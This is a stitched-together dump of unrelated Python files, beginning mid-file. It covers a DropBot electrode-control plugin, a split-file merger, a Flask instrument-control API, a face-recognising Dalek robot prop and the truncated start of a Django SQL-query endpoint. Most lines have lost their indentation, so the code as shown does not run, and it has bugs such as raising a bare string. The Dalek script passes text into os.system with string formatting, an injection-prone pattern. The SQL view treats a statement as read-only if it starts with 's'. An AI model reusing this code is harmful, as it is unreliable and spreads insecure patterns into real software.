print("Error setting frequency")
print(e)
async def put_voltage_frequency(self, payload, params):
self.control_board.voltage = float(payload["voltage"])
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
async def turn_on_electrodes(self, payload, params):
# Get the three object from device-model
        microdrop = MicropedeAsync(APPNAME, port=self.port, loop=self.loop)
three_object = await microdrop.get_state('device-model', 'three-object')
active_electrodes = payload
def active_filter(obj):
return _.includes(active_electrodes, obj["id"])
active_objects = _.filter_(three_object, active_filter)
channels = _.map_(_.map_(active_objects, "channel"), int)
max_channels = self.control_board.number_of_channels
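        # Build a 0/1 vector over every channel and switch on only the channels
        # backing the currently active electrodes.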
channel_states = np.zeros(max_channels, dtype=int)
channel_states[channels] = 1
self.control_board.set_state_of_channels(channel_states)
print(self.control_board.state_of_channels)
await self.update_board_info()
async def measure_voltage(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
voltage = self.control_board.measure_voltage()
self.notify_sender(payload, voltage, "measure-voltage")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-voltage", "failed")
async def measure_capacitance(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
capacitance = self.control_board.measure_capacitance()
self.notify_sender(payload, capacitance, "measure-capacitance")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-capacitance", "failed")
async def connect_dropbot(self, payload, params):
try:
setup_serial_proxy(self)
await self.update_board_info()
self.notify_sender(payload, "connected!", "connect-dropbot")
except Exception as e:
print("ERROR::", e)
self.notify_sender(payload, dump_stack(self.name, e),
"connect-dropbot", "failed")
async def put_frequency(self, payload, params):
""" Set the switching frequency of the active fluxels"""
try:
self.validate_schema(payload)
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
self.notify_sender(payload, self.control_board.frequency, "frequency")
except Exception as e:
print(e)
            self.notify_sender(payload, dump_stack(self.name, e),
                               "frequency", "failed")
async def put_voltage(self, payload, params):
""" Set the on voltage for fluxels"""
try:
print("PUT VOLTAGE CALLED!")
self.validate_schema(payload)
self.control_board.voltage = float(payload["voltage"])
print("SETTING STATE OF VOLTAGE TO:", payload["voltage"])
print("SETTING STATE!!")
await self.update_board_info()
print("SET SUCCESSFUL")
self.notify_sender(payload, self.control_board.voltage, "voltage")
except Exception as e:
print(e)
            self.notify_sender(payload, dump_stack(self.name, e),
                               "voltage", "failed")
print("Running dropbot plugin")
dropbot = DropBot("microdrop", host="localhost", port=1884, name="dropbot")
|
merge.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author: rjayapalan
Created: March 09, 2022
"""
import os
import csv
from typing import Callable, Optional
import logging
import time
from .common import constant, error
log = logging.getLogger(__name__)
class Merge:
def __init__(self, inputdir: str, outputdir: str, outputfilename: str) -> None:
"""Constructor
Args:
inputdir (str): Dir path to the split files
outputdir (str): Dir path for the output file
outputfilename (str): Filename for the final merged file
"""
log.info('Starting file merge process')
if not os.path.isdir(inputdir):
raise NotADirectoryError(
f'Given input directory path "{inputdir}" is not a valid directory.')
if not os.path.isdir(outputdir):
raise NotADirectoryError(
f'Given output directory path "{outputdir}" is not a valid directory.')
self._inputdir = inputdir
self._outputdir = outputdir
self._outputfilename = outputfilename
self._terminate = False
self._manfilename = constant.MANIFEST_FILE_NAME
self._starttime = time.time()
@property
def terminate(self) -> bool:
"""Returns terminate flag value
Returns:
bool: True/False
"""
return self._terminate
@property
def inputdir(self) -> str:
"""Returns path to the input dir
Returns:
str: Dir path
"""
return self._inputdir
@property
def outputdir(self) -> str:
"""Returns output dir path
Returns:
str: Dir path
"""
return self._outputdir
@property
def outputfilename(self) -> str:
"""Returns output filename
Returns:
str: Output filename
"""
return self._outputfilename
@property
def manfilename(self) -> str:
"""Returns manifest filename
Returns:
str: Manifest filename
"""
return self._manfilename
@terminate.setter
def terminate(self, value: bool) -> None:
"""Sets terminate flag that will terminate the process
Args:
value (bool): True/False
"""
self._terminate = value
@manfilename.setter
def manfilename(self, value: str) -> None:
"""Sets manifest filename
Args:
value (str): Manifest filename
"""
self._manfilename = value
def _getmanifestpath(self) -> str:
"""Returns manifest filepath
Returns:
str: Manifest filepath
"""
filepath = os.path.join(self.inputdir, self.manfilename)
if not os.path.exists(filepath):
raise FileNotFoundError(
f'Manifest file "{self.manfilename}" not found in "{self.inputdir}"')
return filepath
def _getoutputfilepath(self) -> str:
"""Returns absolute path of the output file
Returns:
str: Output file path
"""
filepath = os.path.join(self.outputdir, self.outputfilename)
return filepath
def _endprocess(self):
"""Runs statements that marks the completion of the process
"""
endtime = time.time()
runtime = int((endtime - self._starttime)/60)
log.info(f'Process completed in {runtime} min(s)')
def merge(self, cleanup: bool = False, callback: Optional[Callable] = None) -> None:
"""Merges the split files back into one single file
Args:
cleanup (bool, optional): If true, all the split files and manifest
file will be purged after successful merge. Defaults to False.
callback (Optional[Callable], optional): Callback function to invoke
after all the splits have been merged.
The callback passes merged file path, size [str, int] as args.
Defaults to None.
"""
manfile = self._getmanifestpath()
outputfile = self._getoutputfilepath()
with open(manfile, mode='r', encoding='utf8', newline='') as reader:
with open(outputfile, mode='wb+') as writer:
csvreader = csv.DictReader(reader)
skipheader = False
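                # Once a split that carries a header row has been written, skip the
                # first line of every later split so the header appears only once.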
for line in csvreader:
if self.terminate:
log.info('Term flag has been set by the user.')
log.info('Terminating the process.')
break
splitfilename = line['filename']
splitfile = os.path.join(self.inputdir, splitfilename)
header = True if line['header'].lower(
) == 'true' else False
with open(splitfile, mode='rb') as splitreader:
if skipheader:
next(splitreader)
                        for chunk in splitreader:
                            writer.write(chunk)
if header:
skipheader = True
if cleanup and not self.terminate:
with open(manfile, mode='r', encoding='utf8', newline='') as reader:
csvreader = csv.DictReader(reader)
for line in csvreader:
splitfilename = line['filename']
splitfile = os.path.join(self.inputdir, splitfilename)
if os.path.exists(splitfile):
os.remove(splitfile)
if os.path.exists(manfile):
os.remove(manfile)
if callback:
callback(outputfile, os.path.getsize(outputfile))
self._endprocess()
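# Example manifest layout (illustrative only; the real filename comes from
# constant.MANIFEST_FILE_NAME). merge() expects a CSV with at least a
# 'filename' and a 'header' column, one row per split, e.g.:
#
#   filename,header
#   bigfile_1.csv,True
#   bigfile_2.csv,True
#
# After the first split with header=True has been written in full, the first
# line of each remaining split is skipped so the merged file carries a single
# header row.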
# if __name__ == '__main__':
# import threading
# import time
# def cb(path, size):
# print(f'{path} : {size}')
# def terminatemerge(mergeinstance: Merge, after: int):
# time.sleep(after)
# mergeinstance.terminate = True
# print('terminating')
# merge = Merge(inputdir='/Users/rjayapalan/Downloads/split_test',
# outputdir='/Users/rjayapalan/Downloads/split_test',
# outputfilename='mergedfile.csv',
# )
# th = threading.Thread(target=terminatemerge, args=(merge, 2))
# th.daemon = True
# th.start()
# merge.merge(cleanup=True, callback=cb)
|
api.py
|
from flask import Flask, request, render_template
import requests
import json
import importlib, inspect
from parametric import Parameter, Instrument
from parametric.factory import Knob, Switch, Measurement, Selector
from vigilant import Monitor
import attr
from threading import Thread
from optimistic.algorithms import *
from flask_socketio import SocketIO
from functools import partial
import uuid
class API:
def __init__(self, namespace, addr='127.0.0.1', port=8000, debug=False, measurement='test'):
self.addr = addr
self.port = port
self.namespace = namespace
self.debug = debug
self.connected = False
self.monitor = Monitor(period=1, dashboard='Dashboard', measurement=measurement)
self.monitor.start()
def get(self, endpoint):
if endpoint[0] == '/':
endpoint = endpoint[1:]
text = requests.get(f'http://{self.addr}:{self.port}/{endpoint}').text
try:
text = json.loads(text)
except json.JSONDecodeError:
pass
return text
def post(self, endpoint, payload):
''' POST a json-compatible payload to an endpoint '''
if endpoint[0] == '/':
endpoint = endpoint[1:]
response = requests.post(f'http://{self.addr}:{self.port}/{endpoint}', json=payload)
return json.loads(response.text)
@staticmethod
def search(type_, namespace, return_dict=False, name=None):
        ''' Returns all instances of the passed type found in the given namespace dict.
        If a name is given, the matching instance is returned instead; if return_dict
        is True, instances are returned in a dict keyed by their name attribute. '''
instances = []
for x in namespace.keys():
if isinstance(namespace[x], type_):
instances.append(namespace[x])
if name is not None:
for i in instances:
if i.name == name:
return i
if return_dict:
d = {}
for x in instances:
d[x.name] = x
return d
return instances
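    # Example usage (hypothetical namespace and objects, shown for illustration):
    # given a namespace dict holding parametric objects, search() can return them
    # as a list, as a dict keyed by each instance's .name attribute, or as a
    # single instance looked up by its .name.
    #
    #   ns = {'pwr': power_knob, 'sh': shutter_switch}        # hypothetical Knob/Switch
    #   all_params = API.search(Parameter, ns)                # -> list of instances
    #   by_name = API.search(Parameter, ns, return_dict=True) # -> dict keyed by .name
    #   one = API.search(Parameter, ns, name='power')         # -> instance whose .name == 'power'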
def run(self):
self.thread = Thread(target=self.serve)
self.thread.start()
def serve(self):
app = Flask(__name__)
socketio = SocketIO(app, async_mode="threading")
@socketio.on("connect")
def connect():
self.connected = True
def emit_parameter_update(id, value):
socketio.emit('parameter', {'id': id,
'value': value})
def prepare_state(state=None, namespace=None, parent_id=None, return_handle=False, path=''):
''' Recursively search through instruments and prepare a flattened state
First pass: look for parameters in the current namespace and add them to the state;
then, iterate through all instruments
Second pass: look for parameters in each instrument namespace, then iterate through all instruments '''
if namespace is None:
namespace = self.namespace
if state is None:
state = {'knobs': {}, 'switches': {}, 'selectors': {}, 'measurements': {}, 'instruments': {}}
''' Search parameters within namespace '''
for child in self.search(Parameter, namespace, return_dict=True).values():
entry = {'name': child.name, 'instrument': parent_id, 'path': path + child.name}
if isinstance(child, Knob):
id = str(len(state['knobs']))
entry['value'] = child.get()
entry['min'] = child.bounds[0]
entry['max'] = child.bounds[1]
if return_handle:
entry['handle'] = child
state['knobs'][id] = entry
state['instruments'][parent_id]['knobs'].append(id)
child.callbacks['api'] = partial(emit_parameter_update, id)
elif isinstance(child, Switch):
id = str(len(state['switches']))
entry['value'] = child.get()
if return_handle:
entry['handle'] = child
state['switches'][id] = entry
state['instruments'][parent_id]['switches'].append(id)
elif isinstance(child, Measurement):
id = str(len(state['measurements']))
entry['min'] = child.bounds[0]
entry['max'] = child.bounds[1]
if return_handle:
entry['handle'] = child
child.id = id
state['measurements'][id] = entry
state['instruments'][parent_id]['measurements'].append(id)
elif isinstance(child, Selector):
id = str(len(state['selectors']))
entry['value'] = child.get()
entry['options'] = child.options
if return_handle:
entry['handle'] = child
state['selectors'][id] = entry
state['instruments'][parent_id]['selectors'].append(id)
''' Search instruments '''
for instrument in self.search(Instrument, namespace, return_dict=True).values():
instrument_entry = {'name': instrument.name,
'path': path + instrument.name + '/',
'children': [],
'switches': [],
'selectors': [],
'knobs': [],
'measurements': [],
'parent': None}
instrument_id = str(len(state['instruments']))
if parent_id is not None:
state['instruments'][parent_id]['children'].append(instrument_id)
instrument_entry['parent'] = parent_id
if return_handle:
instrument_entry['handle'] = instrument
state['instruments'][instrument_id] = instrument_entry
state = prepare_state(state,
namespace = instrument.__dict__,
parent_id = instrument_id,
return_handle = return_handle,
path = instrument_entry['path'])
return state
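        # Shape of the flattened state built above (handles and ids are assigned here):
        #   state['instruments'][iid] = {'name', 'path', 'children', 'knobs',
        #                                'switches', 'selectors', 'measurements', 'parent'}
        #   state['knobs'][kid]       = {'name', 'instrument', 'path', 'value', 'min', 'max'}
        # Each id is the stringified insertion index; when return_handle is True every
        # entry also carries a 'handle' reference to the live object.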
def get_measurement_id(state, measurement):
for id in state['measurements']:
if state['measurements'][id]['handle'] is measurement:
return id
def find_observers(state):
observers = []
for category in self.monitor.categories:
for name, observer in self.monitor.categories[category].items():
id = get_measurement_id(state, observer._measure)
observers.append(id)
return observers
@app.route("/")
def hello():
frontend_state = prepare_state()
self.state = prepare_state(return_handle=True)
self.state['observers'] = find_observers(self.state)
frontend_state['observers'] = self.state['observers']
app.config['state'] = self.state
app.config['results'] = {}
app.config['monitor'] = self.monitor
return render_template('index.html', state=frontend_state)
''' Parametric endpoints '''
from .parameters import parameters
app.register_blueprint(parameters, url_prefix='/')
''' Optimistic endpoints '''
from .optimization import optimization
app.register_blueprint(optimization, url_prefix='/optimistic')
''' Vigilant endpoints '''
from .monitoring import monitoring
app.register_blueprint(monitoring, url_prefix='/monitor')
socketio.run(app, host=self.addr, port=self.port, debug=self.debug)
|
dalek_state.py
|
#!/usr/bin/env python3
"""Dalek State Machine
This module provides a state machine that enables a Dalek to recognise people within
its field of view and either welcome them by name, or threaten them if it doesn't
recognise them. It assumes:
* the use of an Adafruit Servo Controller to control an iris servo
and the lights within the eye and dome (using a TIP120 transistor to amplify the PWM signal)
* a Pi High Quality camera with 6mm lens
* a Google Coral TPU to provide acceleration for the face detection function
* a database of face descriptors and labels as created by the training.py program
(so be sure to run that program first!)
* a USB microphone and an amplifier for the dalek voice
The Dalek operator can also optionally activate and deactivate the Dalek via an MQTT message
over Bluetooth BLE; this assumes that there is a localhost MQTT server
Example:
$ python3 dalek_state.py
Todo:
* Add in the hover lights on an additional servo channel
* Use the location and eye distance of the detected face to calculate distance and
bearing so the dome can swivel to look directly at the persons being talked to
Useful blog posts for setup: https://k9-build.blogspot.com/search/label/dalek
Dalek and K9 word marks and logos are trade marks of the British Broadcasting Corporation and
are copyright BBC/Terry Nation 1963
"""
import os
import time
import random
from threading import Thread
# import servo board
from board import SCL, SDA
import busio
from adafruit_pca9685 import PCA9685
# import image and DL processing
import cv2
import numpy as np
import dlib
from edgetpu.detection.engine import DetectionEngine
from imutils.video import VideoStream
from PIL import Image
# import audio and messaging
import pyaudio
import paho.mqtt.client as mqtt
# import local helper classes
from faceextractor import FaceDataExtractor
from recognizer import FaceRecognizer
FREQUENCY = 50
PERIOD = 1.0 / float(FREQUENCY) * 1000.0
# create iris servo
i2c_bus = busio.I2C(SCL, SDA)
pca = PCA9685(i2c_bus)
pca.frequency = FREQUENCY
# Initialise the pygame mixer for sound and sound effect
#pygame.mixer.init()
#pygame.mixer.music.load("./controlroom.wav")
DEAD_TIME = 30 # minimum time in seconds between doorman announcements
EVENT_GAP = 5 # maximum time window in seconds for valid detection events
# no. of recognition events needed with less than
# EVENT_GAP between them to hit threshold
THRESHOLD = 3
UNKNOWN_THRESHOLD = 5 # number of unknown events to hit threshold
UNKNOWN_GAP = 30 # maximum time window in seconds for valid unknown events
SAMPLES = 8 # number of training photos per person (limit 50 in total)
CHUNK = 2**13 # buffer size for audio capture and analysis
RATE = 44100 # recording rate in Hz
MAX = 10000 # minimum volume level for dome lights to illuminate
# These control the three different dalek voices
SPEED_DEFAULT = 175
SPEED_DOWN = 125
AMP_UP = 200
AMP_DEFAULT = 190
AMP_DOWN = 180
PITCH_DEFAULT = 99
PITCH_DOWN = 69
SOX_VOL_UP = 5000
SOX_VOL_DEFAULT = 20
SOX_VOL_DOWN = 10
SOX_PITCH_UP = 50
SOX_PITCH_DEFAULT = 0
SOX_PITCH_DOWN = -25
# Servo Channels
IRIS_SERVO = 4
DOME_LIGHTS = 0
IRIS_LIGHT = 1
# Convenience Servo Values
ON = 1.0
AWAKE = True
ASLEEP = False
OFF = 0.0
STEPS = 100
DURATION = 1.0
SERVO_MAX = 0.8
SERVO_MIN = 0.2
# Values to control whether dome lights are on or off
VOL_MIN = 400
VOL_MAX = 8000
HEIGHT = 1080 # pixels
WIDTH = 1920 # pixels
RESOLUTION = (WIDTH, HEIGHT)
FRAMERATE = 30
unknown_count = 0 # number of times an unknown face has been seen
unknown_seen = round(time.time())
print("Loading face detection engine...")
model = DetectionEngine("/usr/share/edgetpu/examples/models/"
"ssd_mobilenet_v2_face_quant_postprocess_edgetpu.tflite")
print("Loading face landmark detection engine...")
shape_pred = dlib.shape_predictor("./shape_predictor_5_face_landmarks.dat")
face_ext = FaceDataExtractor()
print("Loading face recognition engine...")
facerec = dlib.face_recognition_model_v1("./dlib_face_recognition_resnet_model_v1.dat")
face_recog = FaceRecognizer()
print("Starting video stream...")
vs = VideoStream(src=0,
usePiCamera = True,
resolution=RESOLUTION,
framerate = FRAMERATE).start()
print("Waiting 5 seconds for camera feed to start...")
time.sleep(5.0) # wait for camera feed to start
print("Opening camera stream...")
def dalek_status(direction):
"""
Opens or closes the dalek eye and lights
Arg:
direction (boolean): True to open, False to close
"""
dalek_servo(IRIS_SERVO, 1-direction)
dalek_light(IRIS_LIGHT, 1-direction)
for pos in range(0, STEPS):
if direction:
value = (float(pos) / float(STEPS))**4
else:
value = (1.0 - (float(pos) / float(STEPS)))**4
dalek_servo(IRIS_SERVO, value)
dalek_light(IRIS_LIGHT, value)
time.sleep(DURATION/STEPS)
dalek_servo(IRIS_SERVO, direction)
dalek_light(IRIS_LIGHT, direction)
def dalek_servo(channel,value):
"""
Changes the servo position of a servo on the Adafruit controller.
    Maximum and minimum safe positions are pre-calculated.
Args:
channel (int): the channel number of the servo (range 0-16)
value (float): value between 0.0 and 1.0
"""
value = SERVO_MIN + (value * (SERVO_MAX - SERVO_MIN)) # normalise between MAX and MIN
value = 1.0 - value # reverse value
value = value + 1.0 # change to range 1.2 to 1.8
duty_cycle = int(value / (PERIOD / 65535.0))
pca.channels[channel].duty_cycle = duty_cycle
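# Worked example of the maths above: with FREQUENCY = 50 Hz the PWM period is 20 ms,
# so for value = 0.5 dalek_servo() computes 0.2 + 0.5 * 0.6 = 0.5, reverses it to 0.5,
# shifts it to a 1.5 ms pulse, and sets duty_cycle = int(1.5 / (20.0 / 65535)) = 4915
# out of 65535, i.e. the servo mid position.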
def dalek_light(channel,value):
"""
Changes the level of illumination of a light attached to the
PWM output of the servo controller.
Args:
channel (int): the channel number of the servo (range 0-16)
value (float): value between 0.0 and 1.0
"""
pca.channels[channel].duty_cycle = int(value * 65535.0)
class Person:
'''The Person class represents the people known to the Dalek'''
def __init__(self, name):
'''The attributes are mostly about when the Dalek last saw them
Attributes
----------
name : str
the name of the person
detected: int
time of last detection event
detection_events: int
number of detection events within EVENT_GAP
last_seen: int
last time Dalek greeted that person
Methods
-------
just_seen :
records a sighting of the person by the robot
'''
self.name = name
self.detection_events = 0 # number of detection events at init is zero
        self.detected = 0 # time of last known detection event
self.last_seen = 0 # time of last announcement
self.now = 0
self.duration = 0
self.gap = 0
def just_seen(self):
'''Record sighting of person'''
self.now = round(time.time()) # record the time of the detection event
self.duration = self.now - self.last_seen # work out how long since last greeting
print("Just seen " + str(self.name) + " after " + str(self.duration) + "s")
        if self.duration > DEAD_TIME: # tests if an announcement is allowed
self.gap = self.now - self.detected # gap = how long since last sighting
self.detected = self.now # record the time of the sighting
self.detection_events += 1 # increment the sightings counter
print("Seen " + str(self.name) +
" " + str(self.detection_events) +
" times. Last time " + str(self.gap) +
"s ago")
if self.gap < EVENT_GAP: # is the gap shorter than the allowed gap?
if self.detection_events >= THRESHOLD: # has the threshold been met?
print("I have seen " + self.name +
" too many times for it to be a false postive.")
# as we are outside the dead time and the threshold has
# been met, then we make an annoucement by
# upadating the Cloudant db with the current time,
# resetting the detection events counter to zero and
# initiating the dalek greeting
self.last_seen = self.now
self.detection_events = 0
dalek_greeting(self.name)
dalek.on_event("greet")
else:
print("Back to watching, detection events for " +
str(self.name) +
" stands at " +
str(self.detection_events))
return
else:
# as the event is outside the window, but a sighting
# has happened then reset the counter to 1
self.detection_events = 1
print("Reset counter. Detection events for " +
str(self.name) +
" is set to " +
str(self.detection_events))
return
else:
print("I've seen " + str(self.name) + ", but recently shouted at them.")
return
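# Debounce logic illustration, with DEAD_TIME=30, EVENT_GAP=5 and THRESHOLD=3:
# sightings of the same person at t=100, 102 and 104 seconds all arrive more than
# 30 s after the last greeting and less than 5 s apart, so the third sighting
# reaches the threshold and triggers dalek_greeting(); any further sighting within
# 30 s of that greeting is ignored as "recently shouted at".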
class State(object):
'''
State parent class to support standard Python functions
'''
def __init__(self):
print('Entering state:', str(self))
def on_event(self, event):
'''
Incoming events processing is delegated to the child State
to define and enable the valid state transitions.
'''
def run(self):
'''
Enable the state to do something - this is usually delegated
to the child States)
'''
print('Run event for ' + str(self) + ' state not implemented')
def __repr__(self):
'''
Leverages the __str__ method to describe the State.
'''
return self.__str__()
def __str__(self):
'''
Returns the name of the State.
'''
return self.__class__.__name__
# Start Dalek states
class Waiting(State):
'''
The child state where the Dalek is scanning for faces, but appears dormant
'''
def __init__(self):
super(Waiting, self).__init__()
def run(self):
faces = detect_faces()
if len(faces) > 0:
dalek.on_event('face_detected')
def on_event(self, event):
if event == 'silent':
return Silent()
if event == 'face_detected':
return WakingUp()
return self
class Silent(State):
'''
The child state where the Dalek does not react without a new signal
from the Bangle.js watch
'''
def __init__(self):
super(Silent, self).__init__()
def run(self):
time.sleep(0.1)
def on_event(self, event):
if event == 'waiting':
return Waiting()
return self
class WakingUp(State):
'''
The child state where the Dalek wakes up by turning its lights on and
    opening its iris
'''
def __init__(self):
super(WakingUp, self).__init__()
dalek_status(AWAKE)
def run(self):
dalek.on_event('dalek_awake')
def on_event(self, event):
if event == 'dalek_awake':
return Awake()
return self
class Awake(State):
'''
The child state where the Dalek searches for a recognizable face
'''
def __init__(self):
super(Awake, self).__init__()
self.now = round(time.time())
def run(self):
countdown = DEAD_TIME + self.now - round(time.time())
if countdown <= 0:
dalek.on_event('timeout')
else:
print("Countdown timer:" + str(countdown))
face_names = recognise_faces()
if len(face_names) > 0:
self.now = round(time.time())
for name in face_names:
if name == "Unknown":
dalek.on_event("exterminate")
else:
dalek_greeting(name)
dalek.on_event("greet")
def on_event(self, event):
if event == 'timeout':
return FallingAsleep()
if event == 'greet':
return Greeting()
if event == 'exterminate':
return Exterminating()
return self
class Greeting(State):
'''
    The child state where the Dalek greets a known person
'''
def run(self):
dalek.on_event('greet_done')
def on_event(self, event):
if event == 'greet_done':
return Awake()
return self
class Exterminating(State):
'''
The child state where the Dalek exterminates someone it doesn't know
'''
def __init__(self):
super(Exterminating, self).__init__()
self.now = round(time.time())
self.unknown_count = 0
def run(self):
countdown = DEAD_TIME + self.now - round(time.time())
if countdown <= 0:
dalek.on_event('timeout')
else:
print("Countdown: " + str(countdown))
face_names = recognise_faces()
if len(face_names) > 0:
self.now = round(time.time())
for face in face_names:
if face == "Unknown":
self.unknown_count += 1
else:
self.unknown_count = 0
dalek.on_event("known_face")
if self.unknown_count < UNKNOWN_THRESHOLD:
print("Exterminating: unknown count - " + str(unknown_count))
else:
warning = ("You are|>unrecognized. Do not|>move!",
">Halt|You are an|>enemy|of the|<Darleks.",
"You are|>unknown|<You will|be|>exterminated!",
"Intruder|>alert!",
"<Enemy|detected!|>Exterminate!",
"Halt. Do not|<move.|You will|>obey!",
"Obey the Darleks!|>Obey the Darleks!",
"Unknown human|<in hall|>Exterminate!",
"Do not|>move.|You will be|>exterminated!",
"Warning|>Warning|Do not move!")
response = random_msg(warning)
self.unknown_count = 0
dalek_speak(response)
dalek.on_event('death')
def on_event(self, event):
if event == 'death':
return Awake()
if event == 'timeout':
return Awake()
if event == 'known_face':
return Awake()
return self
class FallingAsleep(State):
'''
The child state where the Dalek returns to dormant state
'''
def __init__(self):
super(FallingAsleep, self).__init__()
dalek_status(ASLEEP)
def run(self):
dalek.on_event('asleep')
def on_event(self, event):
if event == 'asleep':
return Waiting()
return self
# End Dalek states.
class Dalek(object):
'''
A Dalek finite state machine that starts in waiting state and
    will transition to a new state when a transition event occurs.
It also supports a run command to enable each state to have its
own specific behaviours
'''
def __init__(self):
''' Initialise the Dalek in its Waiting state. '''
# Start with a default state.
dalek_status(AWAKE)
dalek_speak("I am Darlek Fry!")
dalek_status(ASLEEP)
self.state = Waiting()
def run(self):
''' State behavior is delegated to the current state'''
self.state.run()
def on_event(self, event):
'''
Incoming events are delegated to the current state, which then
returns the next valid state.
'''
# The next state will be the result of the on_event function.
self.state = self.state.on_event(event)
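# State transition summary, as implemented by the on_event() methods above:
#   Waiting --face_detected--> WakingUp --dalek_awake--> Awake
#   Awake --greet--> Greeting --greet_done--> Awake
#   Awake --exterminate--> Exterminating --death/timeout/known_face--> Awake
#   Awake --timeout--> FallingAsleep --asleep--> Waiting
#   Waiting --silent--> Silent --waiting--> Waiting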
def detect_faces():
'''
Takes a video frame and detects whether there is a face in the picture
using the Coral TPU.
    This is much quicker than identifying the face, so it is used to wake up
the dalek. This makes the recognition seem much more immediate.
'''
cam_frame = vs.read()
np_frame = cv2.cvtColor(cam_frame, cv2.COLOR_BGR2RGB)
img_frame = Image.fromarray(np_frame)
face_box_list = model.detect_with_image(img_frame,
threshold = 0.9,
keep_aspect_ratio = True,
relative_coord = False,
top_k = 1)
return face_box_list
def recognise_faces():
'''
    Grabs a video frame and detects whether there are faces in the image.
    If there are, it attempts to identify them, returning a list of names,
    with "Unknown" for anyone it cannot recognise.
'''
cam_frame = vs.read()
np_frame = cv2.cvtColor(cam_frame, cv2.COLOR_BGR2RGB)
img_frame = Image.fromarray(np_frame)
face_box_list = model.detect_with_image(img_frame,
threshold = 0.7,
keep_aspect_ratio = True,
relative_coord = False,
top_k = 3)
face_names = []
for face_box in face_box_list:
face_data = face_ext.extract_data(face = face_box, np_frame = np_frame)
if face_data:
face_box = face_box.bounding_box.flatten().astype("int")
(start_x, start_y, end_x, end_y) = face_box
box = dlib.rectangle(left = start_x,
right = end_x,
top = start_y,
bottom = end_y)
shape = shape_pred(np_frame, box)
if shape:
face_chip_img = dlib.get_face_chip(np_frame, shape)
face_descriptor = facerec.compute_face_descriptor(face_chip_img)
name = face_recog.recognize_face(face_descriptor, threshold = 0.7)
face_names.append(name)
return face_names
def dalek_speak(speech):
'''
Break speech up into clauses and speak each one with
various pitches, volumes and distortions
to make the voice more Dalek like
'''
clauses = speech.split("|")
for clause in clauses:
if clause and not clause.isspace():
if clause[:1] == ">":
clause = clause[1:]
pitch = PITCH_DEFAULT
speed = SPEED_DOWN
amplitude = AMP_UP
sox_vol = SOX_VOL_UP
sox_pitch = SOX_PITCH_UP
elif clause[:1] == "<":
clause = clause[1:]
pitch = PITCH_DOWN
speed = SPEED_DOWN
amplitude = AMP_DOWN
sox_vol = SOX_VOL_DOWN
sox_pitch = SOX_PITCH_DOWN
else:
pitch = PITCH_DEFAULT
speed = SPEED_DEFAULT
amplitude = AMP_DEFAULT
sox_vol = SOX_VOL_DEFAULT
sox_pitch = SOX_PITCH_DEFAULT
print(clause)
cmd = ("espeak -v en-rp '%s' -p %s -s %s -a %s -z "
"--stdout|play -v %s - synth sine fmod 25 pitch %s" %
(clause, pitch, speed, amplitude, sox_vol, sox_pitch))
os.system(cmd)
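# Markup example: clauses are separated by '|'; a leading '>' raises amplitude,
# sox volume and pitch-shift for emphasis, while a leading '<' lowers pitch,
# amplitude and volume, e.g.
#   dalek_speak("You are|>unknown|<You will|be|>exterminated!")
# speaks five clauses with alternating emphasis through espeak piped into play.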
def random_msg(phrase_dict):
'''Choose a random phrase from a list'''
length = len(phrase_dict)
index = random.randint(0, length-1)
message = phrase_dict[index]
return message
def dalek_greeting(name):
'''Dalek will issue an appropriate greeting depending upon context'''
greeting = ("Have a|>nice|day|>name",
"Hello name, you are a|>friend|of the|<Darleks",
"Greetings name",
"Hello name",
"name is recognized",
"name is in the hall")
response = random_msg(greeting)
response = response.replace('name', name)
print(response)
dalek_speak(response)
return
# Sets up a daemon thread to flash lights in line with sound
def flash_dome_lights():
''' Daemon thread to flash lights based on microphone noise '''
while True:
try:
data = np.frombuffer(stream.read(CHUNK, False),dtype=np.int16)
vol = abs(int(np.average(np.abs(data))))
print(vol)
if vol > VOL_MIN:
vol = min(1.0, vol/VOL_MAX)
dalek_light(DOME_LIGHTS, vol)
else:
dalek_light(DOME_LIGHTS, 0)
except ValueError:
print ("Volume out of range: " + vol)
# start the background thread to flash the Dome Lights
p = pyaudio.PyAudio()
stream=p.open(format=pyaudio.paInt16,channels=1,rate=RATE,input=True,
frames_per_buffer=CHUNK, input_device_index=2)
domeLightsThread = Thread(target=flash_dome_lights, daemon=True)
domeLightsThread.start()
dalek = Dalek()
last_message = ""
client = mqtt.Client("dalek-python")
client.connect("localhost")
# client.publish("test/message","did you get this?")
def on_message(client, userdata, message):
    """
    Enables the Dalek to receive a message from an Espruino Watch via
    MQTT over Bluetooth (BLE) to place it into active or inactive States
    """
global last_message
payload = str(message.payload.decode("utf-8"))
if payload != last_message:
last_message = payload
payload = payload.replace('"', "")
command = payload.split(",")
print(command)
if command[1] == "Dale" and command[2] == "face" and command[3] == "on":
dalek.on_event('waiting')
if command[1] == "Dale" and command[2] == "face" and command[3] == "off":
dalek.on_event('silent')
else:
dalek.on_event('unknown')
client.on_message = on_message # attach function to callback
client.subscribe("/ble/advertise/d3:fe:97:d2:d1:9e/espruino/#")
try:
while True:
dalek.run()
time.sleep(0.1)
client.loop(0.1)
except KeyboardInterrupt:
pca.deinit()
stream.stop_stream()
stream.close()
p.terminate()
client.loop_stop()
print("Dalek stopped by user.")
|
serachsql.py
|
import json
import logging
import time
import re
import threading
import configparser
from django.db.models import Count
from libs import util
from rest_framework.response import Response
from libs.serializers import Query_review, Query_list
from libs import baseview, send_email
from libs import con_database
from core.models import DatabaseList, Account, querypermissions, query_order
CUSTOM_ERROR = logging.getLogger('Yearning.core.views')
conf = util.conf_path()
CONF = configparser.ConfigParser()
CONF.read('deploy.conf')
WEBHOOK = CONF.get('webhook', 'dingding')
class search(baseview.BaseView):
'''
    :argument SQL query endpoint: filters out non-query statements and returns the query result.
        The LIMIT row count can be set freely; when it exceeds the maximum allowed in the config file, the config file maximum is used instead.
'''
def post(self, request, args=None):
sql = request.data['sql']
check = str(sql).strip().split(';\n')
user = query_order.objects.filter(username=request.user).order_by('-id').first()
if user.query_per == 1:
            if not check[-1].strip().lower().startswith('s'):
return Response({'error': '只支持查询功能或删除不必要的空白行!'})
else:
address = json.loads(request.data['address'])
_c = DatabaseList.objects.filter(
connection_name=user.connection_name,
computer_room=user.computer_room
).first()
try:
with con_database.SQLgo(
ip=_c.ip,
password=_c.password,
user=_c.username,
port=_c.port,
db=address['basename']
) as f:
